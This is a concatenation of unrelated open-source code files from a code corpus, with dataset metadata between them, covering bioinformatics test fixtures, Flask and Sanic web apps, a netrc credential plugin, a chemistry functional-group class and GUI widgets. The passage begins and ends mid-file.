ratt_out = """##gff-version 3
Staphylococcus_aureus_HG003 Refseq source 1 2821337 . + . mol_type=genomic DNA;db_xref=taxon:93061;strain=NCTC 8325;organism=Staphylococcus aureus subsp. aureus NCTC 8325;sub_species=aureus
Staphylococcus_aureus_HG003 Refseq gene 517 1878 . + . ID=gene0;Name=dnaA;gene=dnaA;db_xref=GeneID:3919798;locus_tag=SAOUHSC_00001
Staphylococcus_aureus_HG003 Refseq CDS 517 1878 . + . ID=cds0;Name=YP_498609.1;Parent=gene0;gene=dnaA;db_xref=GI:88193824;db_xref=GeneID:3919798;transl_table=11;product=chromosomal replication initiation protein;note=binds to the dnaA-box as an ATP-bound complex at the origin of replication during the initiation of chromosomal replication, can also affect transcription of multiple genes including itself.;locus_tag=SAOUHSC_00001;protein_id=REF_uohsc:SAOUHSC00001;protein_id=YP_498609.1;codon_start=1
Staphylococcus_aureus_HG003 Refseq gene 2156 3289 . + . ID=gene1;Name=SAOUHSC_00002;db_xref=GeneID:3919799;locus_tag=SAOUHSC_00002
Staphylococcus_aureus_HG003 Refseq tRNA 2156 3289 . + . ID=rna0;Name=SAOUHSC_00002;EC_number=2.7.7.7;db_xref=GI:88193825;db_xref=GeneID:3919799;transl_table=11;product=DNA polymerase III subunit beta;note=binds the polymerase to DNA and acts as a sliding clamp;locus_tag=SAOUHSC_00002;protein_id=REF_uohsc:SAOUHSC00002;protein_id=YP_498610.1;codon_start=1"""
rnaplex_file = """>SAOUHSC_00001|dnaA
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)
>SAOUHSC_00001|dnaA
>srna352
((((((((&)))))))) 163,170 : 24,31 (-1.91 = -8.31 + 0.60 + 5.80)
>SAOUHSC_00001|dnaA
>srna559
(((((((((((((&)))))))))).))) 301,313 : 4,17 (-5.43 = -9.60 + 3.14 + 1.03)
Error during initialization of the duplex in duplexfold_XS
>SAOUHSC_00002
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)"""
rnaplex_out = """>SAOUHSC_00001|dnaA
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)
>SAOUHSC_00001|dnaA
>srna352
((((((((&)))))))) 163,170 : 24,31 (-1.91 = -8.31 + 0.60 + 5.80)
>SAOUHSC_00001|dnaA
>srna559
(((((((((((((&)))))))))).))) 301,313 : 4,17 (-5.43 = -9.60 + 3.14 + 1.03)
>SAOUHSC_00002
>srna1023
((((((&)))))) 571,576 : 20,25 (-5.30 = -7.89 + 0.18 + 2.41)"""
emboss_file = """>A_1
DKSSNSFYKDLFIDFYIKILCITNKQDKVIHRLL
>B_1
NGIVPCLLSSPSILA*SALKRMSSLSLLVLLFAKAKX
>C_1
IELNHLSKQQKFGPTPYLSVVLFEESLLQYX"""
emboss_out = """>A
DKSSNSFYKDLFIDFYIKILCITNKQDKVIHRLL
>B
NGIVPCLLSSPSILA*SALKRMSSLSLLVLLFAKAKX
>C
IELNHLSKQQKFGPTPYLSVVLFEESLLQYX"""
if __name__ == "__main__":
unittest.main()
| 2.578125
| 3
|
tools/diagnostics/base_tech_bundle/kafka_bundle.py
|
snuyanzin/dcos-commons
| 0
|
12775623
|
<reponame>snuyanzin/dcos-commons
import json
import logging
import sdk_cmd
import config
from base_tech_bundle import BaseTechBundle
logger = logging.getLogger(__name__)
class KafkaBundle(BaseTechBundle):
def create(self):
logger.info("Creating Kafka bundle")
brokers = self.create_broker_list_file()
if brokers:
for broker_id in brokers:
self.create_broker_get_file(broker_id)
@config.retry
def create_broker_list_file(self):
rc, stdout, stderr = sdk_cmd.svc_cli(
self.package_name, self.service_name, "broker list", print_output=False
)
if rc != 0 or stderr:
logger.error(
"Could not perform broker list\nstdout: '%s'\nstderr: '%s'", stdout, stderr
)
else:
self.write_file("service_broker_list.json", stdout)
return json.loads(stdout)
@config.retry
def create_broker_get_file(self, broker_id):
rc, stdout, stderr = sdk_cmd.svc_cli(
self.package_name, self.service_name, "broker get %s" % broker_id, print_output=False
)
if rc != 0 or stderr:
logger.error(
"Could not perform broker get %s\nstdout: '%s'\nstderr: '%s'", broker_id, stdout, stderr
)
else:
self.write_file("service_broker_get_%s.json" % broker_id, stdout)
| 1.914063
| 2
|
app.py
|
mjraines/sqlalchemy-challenge
| 0
|
12775624
|
<reponame>mjraines/sqlalchemy-challenge
# Dependencies
import numpy as np
import datetime as dt
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
from flask import Flask, jsonify
# Database Setup
engine = create_engine("sqlite:///Resources/hawaii.sqlite")
# Reflect an existing database into a new model
Base = automap_base()
# Reflect the tables
Base.prepare(engine, reflect=True)
# Save reference to the table
Station = Base.classes.station
Measurement = Base.classes.measurement
# Flask Setup
app = Flask(__name__)
# Flask Routes
@app.route("/")
def welcome():
# List all available api routes
return (
f"Welcome to the Hawaii Weather API!<br/><br/>"
f"Available Routes:<br/>"
f"/api/v1.0/precipitation<br/>"
f"/api/v1.0/stations<br/>"
f"/api/v1.0/tobs<br/><br/>"
f"Available Routes with Variable Input:<br/>"
f"/api/v1.0/2016-04-01<br/>"
f"/api/v1.0/2016-04-01/2017-04-01<br/><br/>"
f"NOTICE:<br/>"
f"Please input the query date in ISO date format(YYYY-MM-DD),<br/>"
f"and the start date should not be later than 2017-08-23."
)
@app.route("/api/v1.0/precipitation")
def precipitation():
# Create our session (link) from Python to the DB
session = Session(engine)
# Query precipitation measurements
result = session.query(Measurement.date, Measurement.prcp).all()
# Close Session
session.close()
# Create a list of dictionaries with all the precipitation measurements
all_prcp = []
for date, prcp in result:
prcp_dict = {}
prcp_dict[date] = prcp
all_prcp.append(prcp_dict)
return jsonify(all_prcp)
@app.route("/api/v1.0/stations")
def stations():
# Create our session (link) from Python to the DB
session = Session(engine)
# Find out all the stations
stations = session.query(Station.station).distinct().all()
# Close Session
session.close()
# Create a list of dictionaries with all the stations
station_list = []
for i in range(len(stations)):
station_dict = {}
name = f'Station {i + 1}'
        station_dict[name] = stations[i][0]
station_list.append(station_dict)
return jsonify(station_list)
@app.route("/api/v1.0/tobs")
def tobs():
# Session (link) from Python to the DB
session = Session(engine)
# Find out the most recent date in the data set and convert it to date format
recent_date = session.query(Measurement).order_by(Measurement.date.desc()).first()
last_date = dt.datetime.strptime(recent_date.date, '%Y-%m-%d').date()
# Retrieve the last 12 months of temperature data
year_earlier = last_date - dt.timedelta(days=365)
# Set up the list for query and find out the most active station
active_station_list = [Measurement.station, func.count(Measurement.station)]
active_station = session.query(*active_station_list).group_by(Measurement.station).\
order_by(func.count(Measurement.station).desc()).first().station
# Pick out last 12 months of temperature measurements of the most active station throughout
active_station_temp = session.query(Measurement.date, Measurement.tobs).\
filter(func.strftime('%Y-%m-%d', Measurement.date) > year_earlier).\
filter(Measurement.station == active_station).all()
# Close Session
session.close()
# Create a list of dictionaries with the date and temperature with for loop
all_temp = []
for date, temp in active_station_temp:
temp_dict = {}
temp_dict['Date'] = date
temp_dict['Temperature'] = temp
all_temp.append(temp_dict)
return jsonify(all_temp)
@app.route("/api/v1.0/<start>")
def date_start(start):
# Create our session (link) from Python to the DB
session = Session(engine)
    # Change the date in string format to datetime.date
year_earlier = dt.datetime.strptime(start, '%Y-%m-%d').date()
# Set up the list for query
temp_list = [func.min(Measurement.tobs),
func.max(Measurement.tobs),
func.avg(Measurement.tobs)]
# Filter out the measurements between the query date
date_temp = session.query(*temp_list).\
filter(func.strftime('%Y-%m-%d', Measurement.date) >= year_earlier).all()
# Close Session
session.close()
    # Build a readable summary of the temperature statistics for the requested range
return (
f"Analysis of temperature from {start} to 2017-08-23 (the latest measurement in database):<br/>"
f"Minimum temperature: {round(date_temp[0][0], 1)} °F<br/>"
f"Maximum temperature: {round(date_temp[0][1], 1)} °F<br/>"
f"Average temperature: {round(date_temp[0][2], 1)} °F"
)
@app.route("/api/v1.0/<start>/<end>")
def date_start_end(start, end):
# Create our session (link) from Python to the DB
session = Session(engine)
    # Change the dates in string format to datetime.date
query_date_start = dt.datetime.strptime(start, '%Y-%m-%d').date()
query_date_end = dt.datetime.strptime(end, '%Y-%m-%d').date()
# Set up the list for query
temp_list = [func.min(Measurement.tobs),
func.max(Measurement.tobs),
func.avg(Measurement.tobs)]
# Pick out the measurements between the query date
date_temp = session.query(*temp_list).\
filter(func.strftime('%Y-%m-%d', Measurement.date) >= query_date_start).\
filter(func.strftime('%Y-%m-%d', Measurement.date) <= query_date_end).all()
# Close Session
session.close()
return (
f"Analysis of temperature from {start} to {end}:<br/>"
f"Minimum temperature: {round(date_temp[0][0], 1)} °F<br/>"
f"Maximum temperature: {round(date_temp[0][1], 1)} °F<br/>"
f"Average temperature: {round(date_temp[0][2], 1)} °F"
)
if __name__ == '__main__':
app.run(debug=True)
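# Example requests (illustrative only; the host and port assume Flask's defaults used
# by app.run above):
#   curl http://127.0.0.1:5000/api/v1.0/precipitation
#   curl http://127.0.0.1:5000/api/v1.0/stations
#   curl http://127.0.0.1:5000/api/v1.0/2016-04-01/2017-04-01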
| 3.328125
| 3
|
authlib/django/client/__init__.py
|
bobh66/authlib
| 1
|
12775625
|
<gh_stars>1-10
# flake8: noqa
from authlib.deprecate import deprecate
from authlib.integrations.django_client import OAuth, DjangoRemoteApp as RemoteApp
deprecate('Deprecate "authlib.django.client", USE "authlib.integrations.django_client" instead.', '1.0', 'Jeclj', 'rn')
| 1.09375
| 1
|
crazyserv/packagegenerator.py
|
Roemer/CrazyServ
| 5
|
12775626
|
<filename>crazyserv/packagegenerator.py
import random
import numpy as np
from .arena import Arena
from .deliverylogger import DeliveryLogger
from .drone import Drone
class PackageGenerator:
def __init__(self):
self.coordinate_pool = self.define_coordinate_pool()
self.pool_size = self.coordinate_pool.shape[0]
self.package_weights = [0.5, 0.75, 1]
self.rng = {}
self.delivery_loggers = {}
def define_coordinate_pool(self):
arena = Arena(0)
z = arena.min_z
return np.array([
[2.6, 0.6, z],
[2.4, 3.4, z],
[0.6, 2.2, z],
[1.4, 3.2, z],
[1., 1.6, z],
[3.6, 0.6, z],
[3.2, 3.2, z],
[3.4, 1.4, z]
])
def initialize_swarm(self, swarm_id, seed):
self.rng[swarm_id] = random.Random()
self.rng[swarm_id].seed(seed)
self.delivery_loggers[swarm_id] = DeliveryLogger()
return True
def generate_number(self, swarm_id, lower_limit, upper_limit):
return self.rng[swarm_id].randint(lower_limit, upper_limit)
def generate_hash(self, swarm_id):
return self.rng[swarm_id].getrandbits(128)
def get_package(self, swarm_id):
if self.delivery_loggers[swarm_id].log_is_full(swarm_id):
return None
rand = self.generate_number(swarm_id, 0, self.pool_size - 1)
weightIndex = self.generate_number(swarm_id, 0, len(self.package_weights)-1)
weight = self.package_weights[weightIndex]
id = self.generate_hash(swarm_id)
package = {'id': str(id), 'coordinates': self.coordinate_pool[rand].tolist(), 'weight': weight, 'drone': None, 'picked': False}
self.delivery_loggers[swarm_id].add_package(swarm_id, package)
return package
def pickup(self, swarm_id, package_id, drone: Drone):
success = self.delivery_loggers[swarm_id].pickup(swarm_id, package_id, drone)
return success
def deliver(self, swarm_id, package_id, drone: Drone):
success = self.delivery_loggers[swarm_id].deliver(swarm_id, package_id, drone)
return success
def print_deliveries(self, swarm_id):
success = self.delivery_loggers[swarm_id].print_deliveries()
return success
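# Minimal usage sketch (not part of the original module; the swarm id and seed are
# illustrative values only):
#   generator = PackageGenerator()
#   generator.initialize_swarm('swarm-1', seed=42)
#   package = generator.get_package('swarm-1')  # dict with id, coordinates, weight, ...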
| 2.484375
| 2
|
src/data/transforms.py
|
Valentyn1997/oct-diagn-semi-supervised
| 4
|
12775627
|
import numpy as np
from PIL import Image
from src.data.rand_augment import RandAugmentMC
import torchvision.transforms as transforms
def pad(x, border=4):
return np.pad(x, [(0, 0), (border, border), (border, border)], mode='reflect')
class RandomPadandCrop(object):
"""Crop randomly the image.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, width=4, output_size=None):
self.width = width
if output_size is None:
self.output_size = output_size
# assert isinstance(output_size, (int, tuple))
elif isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, x):
        old_w, old_h = x.size  # PIL Image.size is (width, height)
x = np.transpose(x, (2, 0, 1))
x = pad(x, self.width)
h, w = x.shape[1:]
if self.output_size is None:
new_h, new_w = old_h, old_w
else:
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
x = x[:, top: top + new_h, left: left + new_w]
return Image.fromarray(np.transpose(x, (1, 2, 0)))
# TODO Implement TransformKTimes
class TransformTwice:
def __init__(self, transform):
self.transform = transform
def __call__(self, inp):
out1 = self.transform(inp)
out2 = self.transform(inp)
return out1, out2
class TransformFix(object):
def __init__(self, base_transform):
self.weak = base_transform
# Inserting strong augmentation
self.strong = []
for transform in base_transform.transforms:
if isinstance(transform, transforms.ToTensor):
self.strong.append(RandAugmentMC(n=2, m=10))
self.strong.append(transform)
self.strong = transforms.Compose(self.strong)
def __call__(self, inp):
weak = self.weak(inp)
strong = self.strong(inp)
return weak, strong
def build_transforms(normalize=None, center_crop=None, image_size=None,
random_crop=None, flip=None, random_resize_crop=None):
"""
Args:
normalize (tuple or transforms.Normalize): Parameters for data normalization.
center_crop (int): Size for center crop.
image_size (int): Size for image size.
random_crop (int): Size for image random crop.
flip (bool): Randomly flip the data horizontally.
random_resize_crop (dict): Random resize crop the image.
Returns:
Transforms
"""
transform_ = []
if image_size:
if isinstance(image_size, int):
image_size = (image_size, image_size)
transform_.append(transforms.Resize(image_size))
if random_resize_crop:
transform_.append(transforms.RandomResizedCrop(random_resize_crop['size'], random_resize_crop['scale']))
elif random_crop:
transform_.append(transforms.RandomCrop(random_crop))
elif center_crop:
transform_.append(transforms.CenterCrop(center_crop))
if flip:
transform_.append(transforms.RandomHorizontalFlip())
transform_.append(transforms.ToTensor())
if normalize:
if isinstance(normalize, transforms.Normalize):
transform_.append(normalize)
else:
transform_.append(transforms.Normalize(*normalize))
transform = transforms.Compose(transform_)
return transform
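if __name__ == '__main__':
    # Illustrative only (not part of the original module): the sizes and normalization
    # statistics below are assumptions, not values taken from the project configuration.
    train_transform = build_transforms(
        normalize=((0.5,), (0.5,)),
        image_size=256,
        random_crop=224,
        flip=True,
    )
    print(train_transform)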
| 2.8125
| 3
|
models/base_model.py
|
Zelipha/AirBnB_clone
| 0
|
12775628
|
<filename>models/base_model.py
#!/usr/bin/python3
"""
This is a Parent class that will be inherited
"""
import models
import uuid
from datetime import datetime
"""
class BaseModel that defines all common attributes/methods for other classes
"""
class BaseModel:
def __init__(self, *args, **kwargs):
"""initializing all attributes
"""
self.id = str(uuid.uuid4())
self.created_at = datetime.today()
self.updated_at = datetime.today()
if len(kwargs) != 0:
for key, value in kwargs.items():
if key == 'created_at' or key == 'updated_at':
f = "%Y-%m-%dT%H:%M:%S.%f"
self.__dict__[key] = datetime.strptime(value, f)
else:
self.__dict__[key] = value
else:
models.storage.new(self)
def __str__(self):
"""
Returns:
-class name
-id and
-attribute dictionary
"""
class_name = self.__class__.__name__
return "[{}] ({}) {}".format(class_name, self.id, self.__dict__)
def save(self):
"""
updates the public instance attribute 'updated_at'
with the current datetime
"""
self.updated_at = datetime.today()
models.storage.save()
def to_dict(self):
"""
returns a dictionary containing all keys/values of '__dict__'
of the instance
"""
converted = self.__dict__.copy()
converted["created_at"] = self.created_at.isoformat()
converted["updated_at"] = self.updated_at.isoformat()
converted["__class__"] = self.__class__.__name__
return (converted)
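if __name__ == "__main__":
    # Illustrative round trip (not part of the original module; assumes the project's
    # models.storage engine is importable and configured): serialize an instance with
    # to_dict() and rebuild an equivalent instance from that dictionary.
    original = BaseModel()
    as_dict = original.to_dict()
    recreated = BaseModel(**as_dict)
    print(original)
    print(recreated)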
| 3.03125
| 3
|
{{cookiecutter.bot_name}}/bot.py
|
ramnes/cookiecutter-mattermost-bot
| 10
|
12775629
|
<reponame>ramnes/cookiecutter-mattermost-bot
import os
from marshmallow import Schema
from marshmallow.fields import String
from marshmallow.validate import Equal, Length
from sanic import Sanic, response
from sanic.exceptions import abort
# the Mattermost token or tokens generated when you created your slash webhook
MATTERMOST_BOT_TOKEN = os.environ.get('MATTERMOST_BOT_TOKEN')
if not MATTERMOST_BOT_TOKEN:
exit("MATTERMOST_BOT_TOKEN must be set. "
"Please see README.rst for instructions")
app = Sanic(__name__)
class BotSchema(Schema):
text = String(validate=Length(min=3), required=True)
token = String(validate=Equal(MATTERMOST_BOT_TOKEN), required=True)
user_name = String(validate=Length(min=2), required=True)
@app.route('/', methods=['GET'])
async def get(request):
return response.text('Hello there! You might want to POST on this URL.')
@app.route('/', methods=['POST'])
async def post(request):
"""
Mattermost new post event handler
"""
schema = BotSchema().load(request.form)
if schema.errors:
abort(400, schema.errors)
message = "I received \"{}\" from @{}".format(schema.data['text'],
schema.data['user_name'])
return response.json({"text": message})
if __name__ == "__main__":
port = os.environ.get('PORT', 5000)
host = os.environ.get('HOST', '0.0.0.0')
app.run(host=host, port=int(port), auto_reload=True)
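# Example request (illustrative; the port assumes the default of 5000 set above, and
# MATTERMOST_BOT_TOKEN must match the token exported for the app):
#   curl -X POST http://127.0.0.1:5000/ \
#        -d "token=$MATTERMOST_BOT_TOKEN" -d "text=hello there" -d "user_name=alice"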
| 2.03125
| 2
|
app.py
|
EvanLuo42/Exprimere
| 0
|
12775630
|
<filename>app.py
import json
import uuid
from datetime import timedelta
from flask import Flask, request
from routers.sign import sign
from routers.user import user
from routers.article import article
app = Flask(__name__)
app.register_blueprint(user)
app.register_blueprint(sign)
app.register_blueprint(article)
app.config['SECRET_KEY'] = str(uuid.uuid4())
app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(days=1)
@app.route('/')
def index():
return 'Welcome to Exprimere API!'
if __name__ == '__main__':
app.run()
| 2.140625
| 2
|
src/stk/molecular/functional_groups/functional_groups/aldehyde.py
|
stevenkbennett/stk
| 0
|
12775631
|
<reponame>stevenkbennett/stk
"""
Aldehyde
========
"""
from .generic_functional_group import GenericFunctionalGroup
class Aldehyde(GenericFunctionalGroup):
"""
Represents an aldehyde functional group.
The structure of the functional group is given by the pseudo-SMILES
``[atom][carbon](=[oxygen])[hydrogen]``.
"""
def __init__(
self,
carbon,
oxygen,
hydrogen,
atom,
bonders,
deleters,
placers=None,
):
"""
Initialize a :class:`.Aldehyde` instance.
Parameters
----------
carbon : :class:`.C`
The carbon atom.
oxygen : :class:`.O`
The oxygen atom.
hydrogen : :class:`.H`
The hydrogen atom.
atom : :class:`.Atom`
The atom to which the functional group is attached.
bonders : :class:`tuple` of :class:`.Atom`
The bonder atoms.
deleters : :class:`tuple` of :class:`.Atom`
The deleter atoms.
placers : :class:`tuple` of :class:`.Atom`, optional
The placer atoms. If ``None`` the `bonders` will be used.
"""
self._carbon = carbon
self._oxygen = oxygen
self._hydrogen = hydrogen
self._atom = atom
atoms = (carbon, oxygen, hydrogen, atom)
super().__init__(
atoms=atoms,
bonders=bonders,
deleters=deleters,
placers=bonders if placers is None else placers,
)
def get_carbon(self):
"""
Get the carbon atom.
Returns
-------
:class:`.C`
The carbon atom.
"""
return self._carbon
def get_oxygen(self):
"""
Get the oxygen atom.
Returns
-------
:class:`.O`
The oxygen atom.
"""
return self._oxygen
def get_hydrogen(self):
"""
Get the hydrogen atom.
Returns
-------
:class:`.H`
The hydrogen atom.
"""
return self._hydrogen
def get_atom(self):
"""
Get the atom to which the functional group is attached.
Returns
-------
:class:`.Atom`
The atom to which the functional group is attached.
"""
return self._atom
def with_atoms(self, atom_map):
clone = super().with_atoms(atom_map)
clone._carbon = atom_map.get(
self._carbon.get_id(),
self._carbon,
)
clone._oxygen = atom_map.get(
self._oxygen.get_id(),
self._oxygen,
)
clone._hydrogen = atom_map.get(
self._hydrogen.get_id(),
self._hydrogen,
)
clone._atom = atom_map.get(
self._atom.get_id(),
self._atom,
)
return clone
def clone(self):
clone = super().clone()
clone._carbon = self._carbon
clone._oxygen = self._oxygen
clone._hydrogen = self._hydrogen
clone._atom = self._atom
return clone
def __repr__(self):
return (
f'{self.__class__.__name__}('
f'{self._carbon}, {self._oxygen}, {self._hydrogen}, '
f'{self._atom}, bonders={self._bonders}, '
f'deleters={self._deleters})'
)
| 3.359375
| 3
|
plugins/auth_netrc.py
|
ppetr/ddupdate
| 0
|
12775632
|
"""
Implement credentials lookup using the ~/.netrc(5) file.
"""
import base64
import binascii
from netrc import netrc
import os.path
from ddupdate.ddplugin import AuthPlugin, AuthError
class AuthNetrc(AuthPlugin):
"""Get credentials stored in the .netrc(5) file.
This is the original storage used before 0.7.1. It is less secure
than for example the keyring but is convenient and, since it does
not require anything to be unlocked, a good candidate for servers.
"""
_name = 'netrc'
_oneliner = 'Store credentials in .netrc(5)'
__version__ = '0.7.1'
def get_auth(self, machine):
"""Implement AuthPlugin::get_auth()."""
path = os.environ.get('NETRC', '')
if path:
pass
elif os.path.exists(os.path.expanduser('~/.netrc')):
path = os.path.expanduser('~/.netrc')
elif os.path.exists('/etc/netrc'):
path = '/etc/netrc'
else:
raise AuthError("Cannot locate the netrc file (see manpage).")
auth = netrc(path).authenticators(machine)
if not auth:
raise AuthError("No .netrc data found for " + machine)
if not auth[2]:
raise AuthError("No password found for " + machine)
try:
pw = base64.b64decode(auth[2]).decode('ascii')
except (binascii.Error, UnicodeDecodeError):
pw = auth[2]
return auth[0], pw
def set_password(self, machine, username, password):
"""Implement AuthPlugin::set_password()."""
def is_matching_entry(line):
"""Return True if line contains 'machine' machine'."""
words = line.split(' ')
for i in range(0, len(words) - 1):
if words[i] == 'machine' \
and words[i + 1].lower() == machine.lower():
return True
return False
def new_entry():
"""Return new entry."""
pw = base64.b64encode(password.encode('utf-8')).decode('ascii')
line = 'machine ' + machine.lower()
if username:
line += ' login ' + username
line += ' password ' + pw
return line
path = os.path.expanduser('~/.netrc')
lines = []
if os.path.exists(path):
with open(path, 'r') as f:
lines = f.readlines()
lines = [line for line in lines if not is_matching_entry(line)]
lines.append(new_entry())
lines = [line.strip() + "\n" for line in lines]
with open(path, 'w') as f:
f.writelines(lines)
| 2.9375
| 3
|
ocempgui/widgets/Bin.py
|
illume/eyestabs
| 0
|
12775633
|
<gh_stars>0
# $Id: Bin.py,v 1.29.2.1 2006/08/17 17:06:33 marcusva Exp $
#
# Copyright (c) 2004-2006, <NAME>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""An abstract widget, which can hold exactly one other widget."""
from BaseWidget import BaseWidget
class Bin (BaseWidget):
"""Bin () -> Bin
A container widget class, which can hold one other widget.
The Bin widget class is an abstract class, which can hold exactly
    one other widget. It serves as a container class, which can hold
    various types of widgets and allows inheritors to provide their
    own look.
The widget to hold can be set or removed using the 'child' attribute
and set_child() method. The child will not be automatically modified
by rebinding any of its attributes.
bin.child = widget
bin.set_child (widget)
The 'padding' attribute and set_padding() method are used to place a
certain amount of pixels between the child widget and the outer
edges of the Bin.
bin.padding = 10
bin.set_padding (10)
Binding the Bin to a new event manager using the 'manager' attribute
or set_event_manager() method will cause the event manager of the
child to be set to the same.
Default action (invoked by activate()):
None
Mnemonic action (invoked by activate_mnemonic()):
None
Attributes:
    child - The widget held by the Bin.
padding - Additional padding between the child and outer edges of
the Bin. Default is 2.
"""
def __init__ (self):
BaseWidget.__init__ (self)
self._child = None
self._padding = 2
def set_child (self, child=None):
"""B.set_child (...) -> None
Sets (or resets) the child of the Bin.
Creates a parent-child relationship from the Bin to the child by
associating the Bin with the child and vice versa.
Raises a TypeError, if the passed argument does not inherit
from the BaseWidget class.
Raises an Exception, if the passed argument is already
attached to another parent.
"""
self.lock ()
if child:
if not isinstance (child, BaseWidget):
raise TypeError ("child must inherit from BaseWidget")
if child.parent:
raise Exception ("child already has a parent")
child.parent = self
if (child.depth != self.depth):
child.set_depth (self.depth)
if (self.manager != None) and not child.manager:
child.set_event_manager (self.manager)
# Set the states for the child.
if not self.sensitive:
child.set_sensitive (self.sensitive)
if self._child:
self._child.parent = None
self._child = child
self.dirty = True
self.unlock ()
def set_depth (self, depth):
"""B.set_depth (...) -> None
Sets the depth of the Bin.
Sets the depth of the Bin and its child to the given value.
"""
self.lock ()
BaseWidget.set_depth (self, depth)
if self.child:
self.child.set_depth (depth)
self.unlock ()
def set_indexable (self, indexable):
"""B.set_indexable (...) -> None
Sets the indexable of the Bin.
Adds the Bin to an IIndexable implementation and causes its child
to be added to the same, too.
"""
BaseWidget.set_indexable (self, indexable)
if self.child:
self.child.set_indexable (indexable)
def set_event_manager (self, manager):
"""B.set_event_manager (...) -> None
Sets the event manager of the Bin.
Adds the Bin to an event manager and causes its child to be
added to the same, too.
"""
BaseWidget.set_event_manager (self, manager)
if self.child:
self.child.set_event_manager (manager)
def set_sensitive (self, sensitive=True):
"""B.set_sensitive (...) -> None
Sets the sensitivity of the Bin and its child.
"""
self.lock ()
BaseWidget.set_sensitive (self, sensitive)
if self.child:
self.child.set_sensitive (sensitive)
self.unlock ()
def set_padding (self, padding):
"""B.set_padding (...) -> None
Sets the padding between the child and edges of the Bin.
The padding value is the amount of pixels to place between the
edges of the Bin and the contained child.
Raises a TypeError, if the passed argument is not a positive
integer.
"""
if (type (padding) != int) or (padding < 0):
raise TypeError ("padding must be a positive integer")
self._padding = padding
self.dirty = True
def destroy (self):
"""B.destroy () -> None
Destroys the Bin and removes it from its event system.
"""
if self.child:
w = self.child
w.parent = None
self.child = None
w.destroy ()
del w
BaseWidget.destroy (self)
def update (self, **kwargs):
"""B.update (...) -> None
Updates the Bin and refreshes its image and rect content.
Updates the Bin and causes its parent to update itself on
demand.
"""
children = kwargs.get ("children", {})
resize = kwargs.get ("resize", False)
if self.locked:
return
# We have to check for possible size changes here!
if resize:
self.dirty = True
else:
BaseWidget.update (self, children=children, resize=resize)
child = property (lambda self: self._child,
lambda self, var: self.set_child (var),
doc = "The widget hold by the Bin.")
padding = property (lambda self: self._padding,
lambda self, var: self.set_padding (var),
doc = "Additional padding between child and borders.")
| 1.578125
| 2
|
tktrials.py
|
murphyd2/EPICscrape
| 0
|
12775634
|
<reponame>murphyd2/EPICscrape
"<NAME> 08-06-18"
from tkinter import ttk
from tkinter import *
from tkinter import filedialog
import EPICscrape
class Application(ttk.Frame):
def __init__(self, master=None):
ttk.Frame.__init__(self, master)
self.grid()
self.master.title("EPICscrape")
self.EPIC_data=None
self.epic_street_address=None
self.project_ids=None
self.codify= None
self.v = IntVar()
def checked():
"""opens the designated file and checks if the pm_name
field has changed if it has it writes the current cred"""
try:
file= open('PM_contact.csv','r')
data = file.readlines()
file.close()
if (PM_name.get(),PM_email.get()) not in data:
file = open("PM_contact.csv","w")
file.write(PM_name.get()+'\n')
file.write("Project Manager\n")
file.write(PM_email.get()+'\n')
file.close()
except IOError:
file = open("PM_contact.csv", "w")
file.write(PM_name.get() + '\n')
file.write(PM_email.get() + '\n')
file.close()
def get_vcp():
if var1.get()==1:
checked()
rendered_search= EPICscrape.retrieve_EPIC_html(self.project.get())
(self.EPIC_data, self.epic_street_address)= EPICscrape.return_all_EPIC_fields(rendered_search)
self.project_ids= EPICscrape.format_IDs(self.EPIC_data)
if var2.get()==0:
draw_midframe(MidFrame,self.project_ids)
else:
self.codify= EPICscrape.return_codify(self.EPIC_data,self.epic_street_address)
self.codify=final(self.codify)
results.set(self.codify)
res_print.config(text=self.codify)
save_button.config(state=NORMAL)
def midframe_click():
"""once a project ID is selected, runs this"""
self.codify = EPICscrape.return_codify(self.EPIC_data, self.epic_street_address)
x = self.v.get()
repr(x)
self.codify=final(self.codify,x)
            results.set(self.codify)  # TODO: fix the first bit, make the text wrap, and get it saving correctly
res_print.config(text=self.codify)
save_button.config(state=NORMAL)
def draw_midframe(MidFrame,mylist):
r = 1
c = 0
t = 0
tupled_epic_ids = []
index = 0
for id in mylist:
tup= ()
tup= (id,index)
tupled_epic_ids.append(tup)
index += 1
print(tupled_epic_ids)
for id,idx in tupled_epic_ids:
rad = ttk.Radiobutton(MidFrame, command=midframe_click, text=id, variable=self.v, value=idx)
if t % 4 == 0 and t != 0:
r += 1
c = 0
rad.grid(row=r, column=c, sticky=W + E + N + S)
c += 1
t += 1
# return tupled_epic_ids
def final(object,idx=None):
            # Kept for clarity, although this branching turned out to be largely unnecessary.
if var2.get()==0:
